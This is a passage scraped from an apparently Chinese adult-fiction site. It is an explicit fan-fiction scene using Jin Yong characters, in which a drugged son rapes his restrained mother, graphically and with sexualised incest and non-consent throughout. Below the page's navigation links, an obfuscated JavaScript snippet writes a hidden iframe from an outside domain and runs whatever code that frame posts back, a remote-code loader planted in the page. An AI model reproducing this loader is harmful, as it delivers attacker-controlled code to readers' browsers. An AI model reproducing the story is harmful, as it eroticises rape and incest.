  肉棒插到了盡頭,母親嘴裏熱呼呼的氣息噴在他的肉棒上,漲大的龜頭似乎頂到了喉嚨,他低著頭,忽然看見因為呼吸不暢,母親的身子扭動了一下,那雙微閉的俏眼一下子睜開了。

  正處在興奮當中的郭破虜嚇得一下子跳開,肉棒帶出了母親口中的口水,他慌張地向後退了一步,幾乎跌倒。黃蓉猛然驚醒,神智一清,駭然看見兒子郭破虜就在自已麵前,正慌張地後退著,那直挺挺的陰莖向下滴淌著口水,再加上自已口中的感覺,她一下子明白過來,怒叫道:“郭破虜,你、你好……你……這無恥的畜生!”

  郭破虜眼見母親俏臉鐵青,氣得渾身發抖,平時對母親他是又敬又畏的,嚇得一下子跪在地上,忙不迭地磕頭道:“娘親饒命,娘親饒命,孩兒不敢了,再也不敢了。”

  黃蓉渾身亂顫,氣極地道:“畜生,你竟然對親生母親做下如此有悖天倫的醜事,你還……你還……用我的嘴……你……你……,我要殺了你,我一定要殺了你。”

  郭破虜初時的驚慌漸漸地消去,一聽母親的話,知道以她貞烈的個性,說得到做得到,忍不住牙關一咬,把心一橫,一下子站了起來,獰笑道:“娘親,孩兒雖然不知道這是怎幺回事,但襄陽眼看就要城破,那時您不是戰死便是要成為蒙古人的女奴,娘親,姐夫看來已經投降蒙古,你一定會被獻給忽必烈去,早晚還不是被那些蒙古人玩弄,與其如此,不如從了自己兒子吧,姐夫向孩兒保證,娘親隻要從了我,他便會放我二人離去。”

  他一麵說著,一麵一下子撲到黃蓉身上,腫脹的陽具緊貼著她的大腿,由於過於堅挺,龜頭向上翹,沒有插進去,肉莖貼在黃蓉的肉縫上摩擦著。他的雙手抓揉著黃蓉飽漲豐挺的玉乳,手指捏弄著尖挺嫣紅的乳頭,癡狂地叫著:

  “娘親,好娘親,說到底,你不過你是個女人,我是個男人,想開點,你就依了我吧,好娘親。”

  黃蓉那還在敏感當中的小穴被他硬挺水火熱的陽具在肉縫中一陣摩擦,磨得陰唇中那顆紅豆又酥又癢,雪白豐滿的圓翹美臀情不自禁地扭動了一下,可是耳中聽到兒子這般無恥的話,不禁氣得手腳冰涼,竟哆嗦著說不出話來。

  郭破虜被母親的玉體引逗著欲火萬丈,見她未回答自已的話,以為她對自已的話已經認同了,順從了自已的條件,不禁欣喜若狂,一手向下,握著直得已經有些難受的陽具,對準母親那粉嫩的大腿根部柔腴的蜜穴向裏一捅,就陷進了甜蜜的一團泥濘當中。

  黃蓉驚叫一聲,悲哀地感覺到自已親兒子的粗大陽具再次進入了自已的小穴,那裏不久前還清晰地感受到過它的堅挺和有力,但那時自已並不知道他是自已的兒子,而現在,她卻是在清醒當中,無恥地大張著雙腿,露出那縫美穴,任由兒子的肉棒長驅直入,羞憤到了極點,可是卻無法做出絲毫反抗。那密穴生來就是讓男人進入的,竟連絲毫的防衛措施都沒有。

  由於春藥的作用使陰莖的熱度達到了極點,長長的陰莖探入黃蓉的陰道,使她柔軟平坦的小腹也收緊了起來,甬道裏滑膩膩的酥癢難當。郭破虜原本就是個淫魔,今天又被喝了春藥,複而三番五次被打斷交歡的過程,這一插進去,如同蛟龍入海,猛虎歸山,暢快無比,狂呼小叫著:“娘親……啊……好娘親……,你那裏好美啊……就像是會咬人,嗯……兒子好舒服……啊……娘親,挺高點,挺高點……天啊,我要飛啦……”

  黃蓉很無奈,她的身體無法做出任何反抗,就連心理上,也已被今天接二連三的淩辱徹底擊潰,一個是自已的兒子,一個是自已的女婿,自已身為一代女俠,原本清清白白的身子,竟受到這樣兩個關係親密的人的奸淫,現在再次受到玩弄,也不過是已經曆的事情重演一遍罷了,反抗也已不能奪回她失去的貞操。

  郭破虜覺得母親躺在那兒軟軟的一動不動,反不如強行掙紮時來得刺激,可是他強行占有親母親的身體,已是鼓足了勇氣,怎敢枉想她會配合自己?他於是也學著耶律齊的樣子,把手伸到母親那兩瓣豐腴柔美的臀肉下麵,用力把母親的屁股托起來,讓那芳草中的狹縫突出來,迎湊著自已的陽具,接觸的感覺更加真實、更加緊密。

  他雙手抓住了母親結實的臀肉,抬得和自已的胯部平齊,黃蓉如果不做配合,身體軟垂下來,手腕就會痛苦不堪,隻好雙手撐在案上,腰部的肌肉也緊繃起來,使身體可以挺起來些,不至於已經破皮流血的手腕再添痛楚。

  可是這一來,郭破虜的陽具插在小嫩穴裏,那感覺可是妙不可言,隻覺小穴內的肌肉收緊了起來,進出之間,龜頭可以感受到一股很明顯的壓迫感,比處子的陰道還要有力,可是又滑膩猶有勝之,的確是逼中極品,不禁暗思雖然背負了奸淫親母的莫大罪名,能夠玩到如此美妙的女人身體,也算得有所償了。

  郭破虜胯部貼著母親大張的結實飽滿的大腿,開始瘋狂地挺動起來,“啊、啊……好娘親,兒子愛死你了,你的小穴太美了,娘親呀,兒子情願死在你的胯下,啊,好娘親,你美不美?”他一邊顛送,感覺著母親美妙的陰道裏滑膩膩、柔軟緊室的快感,一邊興奮地狂叫,淫性已經大發,什幺倫理道德、親情友愛都已拋到九宵雲外了。

  黃蓉烏油油的秀發披散在案上,映著她端莊嫵媚、白裏透紅的臉龐,透著一種豔入骨髓的美麗,那尖挺紅潤的一對乳頭,就像雪峰頂上的一朵紅花,在狂風中搖擺,圓潤挺拔的晶瑩玉乳沉甸甸的,在兒子強有力的抽插下極有力度地晃動著,帶動美麗的胸部像波浪一般潮起潮落。

  耳聽著兒子如此無恥的話語,她隻能絕望地閉上一雙美眸,珠淚涔涔而下:“畜生,無恥的畜生……連親生母親你也不……放過,你……你還不如殺了我,殺了我……我一定不會放過你的……一定……”她的痛心不隻是受到奸淫侮辱,更強烈的痛苦感覺是,她無法忍受兒子對自已的背叛。她的心中,真的充滿了強烈的殺意,她已經下定決心,一定要殺掉這個自已從小疼愛的兒子。

  郭破虜怎想得到毫不反抗,任由自已盡情奸汙的母親心中轉著這樣可怕的念頭?他捧著母親雪白豐滿的大屁股,淫笑著挺聳,直著硬梆梆的陽具在小穴裏轉動,磨擦,向上、向下、向左右挑動她那嬌嫩幽深的穴心,發出快活的喘息。

  黃蓉的花蕊被他花樣百出的肉棒挑弄著,酥麻無比,心中雖是恨得像是一塊寒冰,已經沒有一絲感情,可是那成熟的身體已不由自主地流出汩汩愛液,麵對身體的誠實反映,冰清玉潔的黃蓉毫無辦法,白生生的玉體任由親兒子瘋狂地采摘操弄著,她嬌喘著,把一腔羞恥都化作仇恨,緊咬牙關,強忍著身體傳來的強烈快感,在心底裏呐喊著:“報仇,我要親手殺了他,殺了這個畜生。”

  “喔……,喔……,好爽,好緊呀……,娘親……”郭破虜把母親的沉默不語視做無聲的允許,把她俏臉上氣怒的紅暈當成了被自已挑逗得性起的征兆,他攏緊了母親豐腴柔軟的圓臀,用力地挺進母親的穴心狂插了幾下,叫道:“好娘親,太美了……我……我想要射進你的身體,啊……,娘親……我要您為我生小孩!”

  郭破虜終於到了極樂的巔峰,他摟緊了母親的豐碩圓臀,用力挺進她小腹下那叢神秘的草溪峽穀裏,狠狠地向前頂著,頂得黃蓉一對豐腴的陰唇向兩旁裂開,露出了那顆陰秘的紅豆,他的龜頭深深探進母親痙攣顫抖著的子宮口,恨不得連兩隻車輪都一起送進母親的下體,激奮昂揚的臉上滲著大顆的汗珠:“喔~娘親……我……射進……去了……你那裏好緊……呃、呃、呃……射……射多一點,好美……”

  “不、不要……啊、啊……不……天啊……”已經麻木了的黃蓉被他那根在自已下體秘穴裏瘋狂噴射的肉棒喚醒了神智,她悲淒地嘶叫著,無力反抗的身體大張著,放任這亂倫的種子細密地擊打在自已的腔道深處,兩行淚水爬上了她的臉頰。

  郭破虜死死地頂在母親的胯間,抱緊了她的豐滿臀部,抽搐著把濃濃的亂倫精液射入她陰道幽深的盡頭,才長出了一口氣,一下子壓在母親釵橫鬢亂、嬌豔性感的胴體上急促地喘息著……但之後他發覺自己的龜頭仍在射精,原來黃蓉運起九陰真經中的采補大法,要將郭破虜的精液吸幹吸盡!終於郭破虜就這樣死在自己娘親的肚皮上。

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:【三國幻想之尚秀列傳】【完】
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};